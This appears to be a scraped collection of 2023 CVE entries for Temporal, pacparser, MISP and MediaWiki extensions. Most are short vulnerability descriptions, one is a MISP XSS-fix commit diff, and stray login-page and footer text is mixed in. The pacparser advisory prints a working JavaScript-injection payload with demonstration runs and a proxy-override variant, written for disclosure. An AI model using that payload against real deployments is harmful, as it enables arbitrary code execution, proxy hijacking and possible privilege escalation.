Insecure defaults in open-source Temporal Server before version 1.20 on all platforms allows an attacker to craft a task token with access to a namespace other than the one specified in the request. Creation of this task token must be done outside of the normal Temporal server flow. It requires the namespace UUID and information from the workflow history for the target namespace. Under these conditions, it is possible to interfere with pending tasks in other namespaces, such as marking a task failed or completed.
If a task is targeted for completion by the attacker, the targeted namespace must also be using the same data converter configuration as the initial, valid, namespace for the task completion payload to be decoded by workers in the target namespace.





CVE-2023-3485: Release v1.20.0 · temporalio/temporal

pacparser_find_proxy in Pacparser before 1.4.2 allows JavaScript injection, and possibly privilege escalation, when the attacker controls the URL (which may be realistic within enterprise security products).

**Summary**

A JavaScript Injection in pacparser_find_proxy() enables the execution of arbitrary JavaScript code in the context of pacparser's 16 years old version of SpiderMonkey. We are aware of security solutions that integrate pacparser and run as root; this creates a vector for local privilege escalation by chaining this injection with vulnerabilities in SpiderMonkey.

**Details**

When software integrating pacparser wants to evaluate the PAC configuration file to identify the proxy to be used for a given URL and host, they may invoke pacparser_find_proxy(). This function loads the PAC script and interpolates the full URL and the host in it using strcat():

char \* 
pacparser\_find\_proxy(const char \*url, const char \*host)
// \[...\]
char \*sanitized\_url \= str\_replace(url, "'", "%27");
// \[...\]
script \= (char\*) malloc(32 + strlen(sanitized\_url) + strlen(host));
script\[0\] \= '\\0';
strcat(script, "findProxyForURL('");
strcat(script, sanitized\_url);
strcat(script, "', '");
strcat(script, host);
strcat(script, "')");

It is interesting to note that single quotes are URL-encoded to prevent url and host from breaking out of the JavaScript string context. However, it does not take into account backslashes that would escape the single quote concatenated right after sanitized_url. In the absence of a strong validation on the host after its extraction from url, this provides two injection points in the resulting script.

This is what the execution of pactester looks like for a correctly-formatted URL:

    $ PACPARSER_DEBUG=1 ./src/pactester -u 'https://google.com' -p tests/proxy.pac
    DEBUG: Pacparser Initalized.
    DEBUG: Parsed the PAC script.
    DEBUG: Parsed the PAC file: tests/proxy.pac
    DEBUG: Finding proxy for URL: https://google.com and Host: google.com
    DEBUG: Executing JavaScript: typeof(findProxyForURL);
    DEBUG: Executing JavaScript: findProxyForURL('https://google.com', 'google.com')
    secureUrl
    DEBUG: Pacparser destroyed.
    

If a backslash is used at the end of the URL, pactester warns of a SyntaxError exception: that's a sign that characters after the backslash are out of a string context:

$ PACPARSER\_DEBUG\=1 ./src/pactester \-u 'https://foo\\\\' -p tests/proxy.pac
DEBUG: Pacparser Initalized.
DEBUG: Parsed the PAC script.
DEBUG: Parsed the PAC file: tests/proxy.pac
DEBUG: Finding proxy for URL: https://foo\\ and Host: foo\\
DEBUG: Executing JavaScript: typeof(findProxyForURL);
DEBUG: Executing JavaScript: findProxyForURL('https://foo\\', 'foo\\')
JSERROR: NULL:1:
SyntaxError: missing ) after argument list
pacparser.c: pacparser\_find\_proxy: Problem in executing findProxyForURL.
pactester.c: Problem in finding proxy for https://foo\\.
DEBUG: Pacparser destroyed.

To execute arbitrary JavaScript code without any restriction (no single quote, etc), have access to the global scope, and raise an exception to show the result of the operation, we came up with the following payload; replace REPLACEME by the URL-encoded JavaScript you want to execute–make sure to correctly escape special characters in the string depending on your shell first:

http://,(function(t){throw(eval(unescape("REPLACEME")))})(this),0)<!--?\

    $ PACPARSER_DEBUG=1 ./src/pactester -u 'http://,(function(t){throw(eval(unescape("REPLACEME")))})(this),0)<!--?\\' -p tests/proxy.pac
    
    DEBUG: Pacparser Initalized.
    DEBUG: Parsed the PAC script.
    DEBUG: Parsed the PAC file: tests/proxy.pac
    DEBUG: Finding proxy for URL: http://,(function(t){throw(eval(unescape("REPLACEME")))})(this),0)<!--?\ and Host: ,(function(t){throw(eval(unescape("REPLACEME")))})(this),0)<!--?\
    DEBUG: Executing JavaScript: typeof(findProxyForURL);
    DEBUG: Executing JavaScript:
    findProxyForURL('http://,(function(t){throw(eval(unescape("REPLACEME")))})(this),0)<!--?\',',(function(t){throw(eval(unescape("REPLACEME")))})(this),0)<!--?\')
    JSERROR: NULL:1: ReferenceError: REPLACEME is not defined
    pacparser.c: pacparser_find_proxy: Problem in executing findProxyForURL.
    pactester.c: Problem in finding proxy for http://,(function(t){throw(eval(unescape("REPLACEME")))})(this),0)<!--?\.
    DEBUG: Pacparser destroyed.
    

The same structure can be used to return arbitrary proxy values:

    $ PACPARSER_DEBUG=1 ./src/pactester -u 'http://,"")&&"foo.bar";<!--?\\' -p
    tests/proxy.pac
    DEBUG: Pacparser Initalized.
    DEBUG: Parsed the PAC script.
    DEBUG: Parsed the PAC file: tests/proxy.pac
    DEBUG: Finding proxy for URL: http://,"")&&"foo.bar";<!--?\ and Host:,"")&&"foo.bar";<!--?\
    DEBUG: Executing JavaScript: typeof(findProxyForURL);
    DEBUG: Executing JavaScript: findProxyForURL('http://,"")&&"foo.bar";<!--?\',',"")&&"foo.bar";<!--?\') 
    foo.bar
    

**Impact**

Attackers with control over the URL can execute arbitrary JavaScript code.

The impact would vary greatly depending on its use, but persistent instances of pacparser (e.g. without calls to pacparser_cleanup() between two proxy resolutions) could be forced to return arbitrary values for proxies by overriding the implementation of functions like findProxyForURL().

The JavaScript engine currently used by pacparser is an old and unsupported version of Spidermonkey. Memory corruption vulnerabilities in the engine could allow the execution of native code. We are aware of enterprise security products embedding pacparser and running as root, in which case attackers could elevate their privileges. We are aware of several memory corruption vulnerabilities in this version of the software, but we didn't (yet) leverage them to obtain arbitrary code execution.

CVE-2023-37360: JavaScript Injection in pacparser_find_proxy() (CVE-2023-37360)

In MISP before 2.4.172, title_for_layout is not properly sanitized in Correlations, CorrelationExclusions, and Layouts.

**Commit**

Permalink

Browse files

Browse the repository at this point in the history

fix: \[layout:title\] Make sure page title are correctly formatted

*   Loading branch information

Showing **6 changed files** with **6 additions** and **6 deletions**.

*   *   *   top\_correlations.ctp
    *   *   over\_correlations.ctp
        *   top.ctp
    *   *   *   default.ctp
        *   default.ctp
        *   error.ctp

2 changes: 1 addition & 1 deletion app/View/CorrelationExclusions/top\_correlations.ctp

Expand Up

@@ -28,7 +28,7 @@

'data\_path' => 'Correlation.count'

\]

\],

'title' => empty($ajax) ? $title\_for\_layout : false,

'title' => empty($ajax) ? h($title\_for\_layout) : false,

'description' => empty($ajax) ? \_\_('The values with the most correlation entries.') : false,

'pull' => 'right',

'actions' => \[

Expand Down

2 changes: 1 addition & 1 deletion app/View/Correlations/over\_correlations.ctp

Expand Up

@@ -63,7 +63,7 @@ echo $this->element('genericElements/IndexTable/index\_table', \[

'element' => 'boolean'

\]

\],

'title' => empty($ajax) ? $title\_for\_layout : false,

'title' => empty($ajax) ? h($title\_for\_layout) : false,

'description' => empty($ajax) ? \_\_('The values with the most correlation entries.') : false,

'pull' => 'right',

'actions' => \[

Expand Down

2 changes: 1 addition & 1 deletion app/View/Correlations/top.ctp

Expand Up

@@ -43,7 +43,7 @@

'class' => 'shortish'

\]

\],

'title' => empty($ajax) ? $title\_for\_layout : false,

'title' => empty($ajax) ? h($title\_for\_layout) : false,

'description' => empty($ajax) ? \_\_('The values with the most correlation entries.') : false,

'pull' => 'right',

'actions' => \[

Expand Down

2 changes: 1 addition & 1 deletion app/View/Layouts/Emails/html/default.ctp

Expand Up

@@ -19,7 +19,7 @@

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"\>

<html\>

<head\>

<title\><?php echo $title\_for\_layout;?></title\>

<title\><?php echo h($title\_for\_layout);?></title\>

</head\>

<body\>

<?php echo $this\->fetch('content');?>

Expand Down

2 changes: 1 addition & 1 deletion app/View/Layouts/default.ctp

Expand Up

@@ -5,7 +5,7 @@

<meta http-equiv\="X-UA-Compatible" content\="IE=edge"\>

<meta name\="viewport" content\="width=device-width"\>

<link rel\="shortcut icon" href\="<?= $baseurl ?>/img/favicon.png"\>

<title\><?= $title\_for\_layout, ' - ', h(Configure::read('MISP.title\_text') ?: 'MISP') ?></title\>

<title\><?= h($title\_for\_layout), ' - ', h(Configure::read('MISP.title\_text') ?: 'MISP') ?></title\>

<?php

$css = \[

\['bootstrap', \['preload' => true\]\],

Expand Down

2 changes: 1 addition & 1 deletion app/View/Layouts/error.ctp

Expand Up

@@ -24,7 +24,7 @@ $cakeDescription = \_\_d('cake\_dev', 'CakePHP: the rapid development php framework

<?php echo $this\->Html\->charset(); ?>

<title\>

<?php echo $cakeDescription ?>:

<?php echo $title\_for\_layout; ?>

<?php echo h($title\_for\_layout); ?>

</title\>

<?php

echo $this\->Html\->meta('icon');

Expand Down

**0 comments on commit 286c84f**

Please sign in to comment.

CVE-2023-37307: fix: [layout:title] Make sure page title are correctly formatted · MISP/MISP@286c84f

An issue was discovered in the DoubleWiki extension for MediaWiki through 1.39.3. includes/DoubleWiki.php allows XSS via the column alignment feature.

To use PolyGerrit, please enable JavaScript in your browser settings, and then refresh this page.

CVE-2023-37304

An issue was discovered in SiteLinksView.php in Wikibase in MediaWiki through 1.39.3. There is XSS via a crafted badge title attribute. This is also related to lack of escaping in wbTemplate (from resources/wikibase/templates.js) for quotes (which can be in a title attribute).

CVE-2023-37302

MISP 2.4.172 mishandles different certificate file extensions in server sync. An attacker can obtain sensitive information because of the nature of the error messages.

CVE-2023-37306: PHP filter chains: file read from error-based oracle

An issue was discovered in the CheckUser extension for MediaWiki through 1.39.3. In certain situations, an attempt to block a user fails after a temporary browser hang and a DBQueryDisconnectedError error message.

CVE-2023-37303

An issue was discovered in SubmitEntityAction in Wikibase in MediaWiki through 1.39.3. Because it doesn't use EditEntity for undo and restore, the intended interaction with AbuseFilter does not occur.

Auth Login

Click the _MediaWiki_ button below to connect your Wikimedia unified account. Alternatively, click the _Wikitech Account (LDAP)_ button to connect your Developer account credentials.  
In case of doubt, check the Phabricator Help.

LDAP Username

LDAP Password

Trouble logging in? Send a login link to your email address.

Content licensed under Creative Commons Attribution-ShareAlike 4.0 (CC-BY-SA) unless otherwise noted; code licensed under GNU General Public License (GPL) or other open source licenses. By using this site, you agree to the Terms of Use, Privacy Policy, and Code of Conduct. · Wikimedia Foundation · Privacy Policy · Code of Conduct · Terms of Use · Disclaimer · CC-BY-SA · GPL

CVE-2023-37301: Log In or Register with LDAP

An issue was discovered in the ProofreadPage (aka Proofread Page) extension for MediaWiki through 1.39.3. In includes/Page/PageContentHandler.php and includes/Page/PageDisplayHandler.php, hidden users can be exposed via public interfaces.

CVE-2023-37305: Log In or Register with LDAP

An issue was discovered in the CheckUserLog API in the CheckUser extension for MediaWiki through 1.39.3. There is incorrect access control for visibility of hidden users.

Source

CVE